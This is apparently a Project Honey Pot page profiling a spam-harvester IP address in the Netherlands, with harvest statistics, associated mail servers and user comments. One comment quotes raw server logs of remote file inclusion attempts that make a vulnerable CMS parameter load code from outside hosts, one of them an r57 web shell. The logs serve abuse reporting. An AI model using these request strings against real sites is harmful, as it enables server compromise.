IP Address Inspector

ATTENTION
  • This IP has not seen any suspicious activity within the last 3 months. This IP is most likely clean and trustworthy now. (This record will remain public for historical purposes, however.)

62.194.97.158

The Project Honey Pot system has detected behavior from the IP address consistent with that of a spam harvester. Below we've reported some other data associated with this IP. This interrelated data helps map spammers' networks and aids in law enforcement efforts. If you know something about this IP, please leave a comment.

Lookup IP In: Domain Tools | SpamHaus | Spamcop | SenderBase | Google Groups | Google

Geographic Location Netherlands ('t Nopeind, Noord-Holland)
Harvester First Seen approximately 4 years, 10 months, 2 weeks ago
Harvester Last Seen within 4 years, 4 months, 4 weeks
Harvester Sightings 694 visit(s) to 185 honey pot(s)
Harvester Results 2.575 messages per visit
1,787 message(s) resulting from harvests
- First: approximately 4 years, 8 months, 3 weeks ago
- Last: approximately 3 years, 11 months, 2 weeks ago
4,959 email address(es) harvested
- First: approximately 4 years, 10 months, 2 weeks ago
- Last: Sun, 16 Sep 2007 13:33:54 -0700
Time From Harvest
To First Spam		 Fastest: 55 mins, 54 secs
Slowest: 1 month, 1 week, 22 hours, 55 mins, 47 secs
Average: 2 days, 9 hours, 16 secs
Std Dev: 5 days, 16 hours, 52 mins, 59 secs
Associated Mail Servers
12.176.188.220 | S
24.47.241.10 | S
24.56.168.165 | S
24.182.116.105 | SD
24.218.121.56 | S
59.125.251.208 | S
61.39.150.36 | S
62.95.110.172 | SD
62.193.228.196 | S
64.13.223.75 | S
64.33.235.120 | S
64.74.142.24 | S
64.83.1.51 | SD
65.23.160.32 | S
65.254.50.194 | S
66.7.193.179 | S
66.110.199.25 | S
66.196.34.110 | S
66.198.224.13 | S
66.215.199.15 | S
69.64.72.12 | SD
69.89.105.70 | S
69.94.75.58 | S
69.147.97.69 | S
70.84.237.162 | S
70.86.48.66 | SD
71.18.216.120 | S
72.224.190.217 | S
72.236.205.140 | S
72.249.44.206 | S
74.208.4.195 | SD
75.65.212.96 | S
75.126.54.114 | S
75.130.91.175 | S
75.136.194.254 | S
75.141.199.30 | S
76.160.46.116 | S
77.232.66.9 | S
77.232.68.30 | S
80.74.148.211 | S
80.86.84.177 | SD
81.3.4.126 | S
81.19.249.26 | SW
81.176.69.156 | S
83.14.161.154 | S
83.98.255.102 | S
83.165.2.224 | S
83.219.142.194 | S
83.230.161.131 | SD
83.243.104.249 | SD
84.19.176.5 | S
84.95.240.250 | SD
85.12.34.40 | S
85.90.209.188 | SD
85.196.168.46 | S
85.214.17.187 | S
85.254.145.215 | S
86.57.133.179 | S
87.231.200.188 | S
88.191.17.73 | S
90.153.255.250 | S
91.121.4.156 | S
121.15.250.147 | S
125.134.24.43 | S
134.241.103.23 | S
141.149.128.21 | S
190.3.69.245 | SC
190.51.119.210 | S
190.65.161.238 | S
190.140.117.188 | S
190.160.109.36 | S
193.25.197.134 | S
193.43.88.81 | S
193.64.141.138 | S
193.138.206.126 | SD
IPs In The Neighborhood
62.194.96.212 | S
62.194.96.224
62.194.96.226
62.194.96.232 | C
62.194.96.240 | S
62.194.96.248 | D
62.194.97.7
62.194.97.10 | S
62.194.97.19 | S
62.194.97.22 | SD
62.194.97.38 | S
62.194.97.69 | S
62.194.97.76
62.194.97.84 | SD
62.194.97.87
62.194.97.92 | S
62.194.97.130 | H
62.194.97.139 | S
62.194.97.142 | S
62.194.97.155 | S
62.194.97.170 | S
62.194.97.171 | S
62.194.97.193 | S
62.194.97.194 | S
62.194.97.209 | S
62.194.97.215 | SD
62.194.97.229 | S
62.194.97.240 | S
62.194.97.242 | S
62.194.97.249 | HS
62.194.98.14 | S
62.194.98.25 | S
62.194.98.28 | S
62.194.98.35 | SD
62.194.98.61 | S
62.194.98.71 | SD
62.194.98.120 | S
62.194.98.122 | S
62.194.97.158's User Agent Strings
8484 Boston Project v 1.0
ISC Systems iRc Search 2.1
Java/1.5.0_11
Java/1.6.0_02
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
P.Hauser commented...
UCEPROTECT-Level-1 blacklisted:

12.176.188.220
12.176.188.80
24.182.116.164
24.182.116.39
24.218.121.114
24.56.168.165
62.194.97.10
64.33.235.120
64.83.1.51

UCEPROTECT-Level-2 blacklisted:
24.182.116.0/24
September 10 2007 05:16 AM
P.Hauser commented...
64.83.1.0/24 Listed at APEWS-L2
-------------------------------
64.83.1.51 is currently listed in APEWS :
Entry matching your Query: E-172568
64.83.1.0/24
CASE: C-82
IP space of "hot" UCE/UBE operations per NANAS, NANAE, UCEtraps & published statistics
Special Reason:
per NANAS, NANAE, UCEtraps, MTA headers continued abuse / abuse volume = escalation ultimately, all your ASN[s] will be listed
History:
Entry created 2007-05-18

66.7.193.179 Listed at APEWS-L2
-------------------------------
66.7.193.179 is currently listed in APEWS :
Entry matching your Query: E-214208
66.7.193.179
CASE: C-82
IP space of "hot" UCE/UBE operations per NANAS, NANAE, UCEtraps & published statistics
Special Reason:
If your IP address is listed, go to Google Groups and search for your criteria in news.admin.net-abuse.sightings for evidence of your problem, you are causing abuse. If your IP address is NOT listed but is part of a larger IP listing, only the block owner can solve the problem, contact your ISP, see FAQ 16. Your ISP needs to action FAQ 42
History:
Entry created 2007-06-14

62.193.228.0/24 Listed at APEWS-L2
----------------------------------
62.193.228.196 is currently listed in APEWS :
Entry matching your Query: E-235312
62.193.228.0/24
CASE: C-137
SANS Internet Storm Center attack sources
Special Reason:
http://isc.incidents.org/sources.html Seems you are hosting attack bot[s]
History:
Entry created 2007-07-06

65.23.160.0/19 Listed at APEWS-L2
---------------------------------
65.23.160.32 is currently listed in APEWS :
Entry matching your Query: E-280779
65.23.160.0/19
CASE: C-130
One or more bots in ASN / CIDR, unprofessional / negligent owner
Special Reason:
Only the ASN/CIDR owner can solve this listing by actioning FAQ 42 apews.org SHUTDOWN BOTS, ZOMBIES, NET ABUSE
History:
Entry created 2007-08-03
September 10 2007 05:15 AM
P.Hauser commented...
From neighborhood-IPs of two of the assoc. mail-servers (66.7.193.179 + 62.193.228.196) we had recently insane GLOBAL-OVERRIDE-attacks:

66.7.193.90 - - [16/Aug/2007:08:59:57 +0200] "GET /index.php?
_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=
&mosConfig_absolute_path=http://xxxxxxx.net/c? HTTP/1.1" 302 223 "-" "libwww-perl/5.79"
66.7.193.90 - - [16/Aug/2007:08:59:57 +0200] "GET /index.php HTTP/1.1" 301 1036 "-" "libwww-perl/5.79"
66.7.193.90 - - [16/Aug/2007:08:59:59 +0200] "GET / HTTP/1.1" 403 13 "-" "libwww-perl/5.79"

66.7.193.90 - - [16/Aug/2007:09:19:50 +0200] "GET /index.php?lang=es/index.php?
_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=
&mosConfig_absolute_path=http://xxxxxxx.net/c? HTTP/1.1" 302 223 "-" "libwww-perl/5.79"
66.7.193.90 - - [16/Aug/2007:09:19:51 +0200] "GET /index.php HTTP/1.1" 301 1036 "-" "libwww-perl/5.79"

66.7.193.90 - - [16/Aug/2007:09:19:53 +0200] "GET / HTTP/1.1" 403 13 "-" "libwww-perl/5.79"
66.7.193.90 - - [16/Aug/2007:09:19:59 +0200] "GET /index.php?lang=en/index.php?
_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=
&mosConfig_absolute_path=http://xxxxxxx.net/c? HTTP/1.1" 302 223 "-" "libwww-perl/5.79"
66.7.193.90 - - [16/Aug/2007:09:19:59 +0200] "GET /index.php HTTP/1.1" 301 1036 "-" "libwww-perl/5.79"
66.7.193.90 - - [16/Aug/2007:09:20:00 +0200] "GET / HTTP/1.1" 403 13 "-" "libwww-perl/5.79"

62.193.228.59 - - [10/May/2007:01:08:03 +0200] "GET /index.php?
_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=
&mosConfig_absolute_path=http://www.xxxxxxxxxxxxxxxxxxx.it/flash/r57.txt?? HTTP/1.1" 302 223 "-" "libwww-perl/5.79"
62.193.228.59 - - [10/May/2007:01:08:03 +0200] "GET /index.php HTTP/1.1" 301 5 "-" "libwww-perl/5.79"
September 10 2007 05:14 AM
P.Hauser commented...
IP 62.194.97.158 hit here two times last year:

62.194.97.158 - - [03/Nov/2006:14:38:53 +0100] "GET / HTTP/1.1" 302 214 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
62.194.97.158 - - [03/Nov/2006:14:38:55 +0100] "GET / HTTP/1.1" 200 66560 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
July 31 2007 12:09 AM
Page generated on: February 13 2012 05:26:07 PM

Please note: being listed on these pages does not necessarily mean an IP address, domain name, or any other information is owned by a spammer. For example, it may have been hijacked from its true owner and used by a spammer.

Want to keep this IP address off your website? Start taking advantage of http:BL.

If you are the owner of this IP address, you can whitelist it by connecting to this paged from the IP itself (or from an IP within /24). Alternatively, the IP will be auto excused after 90 days of no activity.

Twitter Button from twitbuttons.com


Follow projecthoneypot on Twitter

do not follow this link

Privacy Policy | Terms of Use | About Project Honey Pot | FAQ | CloudFlare Site Protection | Contact Us

Copyright © 2004–12, Unspam Technologies, Inc. All rights reserved.

Advertisements displayed on this page are not necessarily endorsed by Project Honey Pot

contact | wiki | email